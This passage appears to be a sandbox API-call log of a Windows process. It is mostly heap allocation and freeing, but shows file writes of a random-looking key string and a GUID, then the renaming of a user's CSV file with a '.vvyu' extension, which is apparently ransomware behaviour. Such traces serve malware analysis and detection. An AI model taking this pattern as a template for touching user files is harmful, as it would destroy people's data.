lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0192.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0192.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0192.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0192.189] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x127d, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x127d, lpOverlapped=0x0) returned 1 [0192.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.190] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1282, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.190] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0192.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0192.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0192.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.191] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0192.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.192] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.192] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0192.192] CloseHandle (hObject=0x584) returned 1 [0192.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0192.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d45778 [0192.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0192.193] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\_wgbJ2d7Z.csv" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\_wgbj2d7z.csv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\_wgbJ2d7Z.csv.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\_wgbj2d7z.csv.vvyu")) returned 1 [0192.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.197] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0192.200] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb060fb0, ftCreationTime.dwHighDateTime=0x1d89ae5, ftLastAccessTime.dwLowDateTime=0x20967730, ftLastAccessTime.dwHighDateTime=0x1d89fd2, ftLastWriteTime.dwLowDateTime=0x20967730, ftLastWriteTime.dwHighDateTime=0x1d89fd2, nFileSizeHigh=0x0, nFileSizeLow=0x1282, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_wgbJ2d7Z.csv", cAlternateFileName="_WGBJ2~1.CSV")) returned 0 [0192.200] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0192.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0192.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0192.201] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0192.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0192.201] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0192.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0192.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0192.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0192.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0192.239] 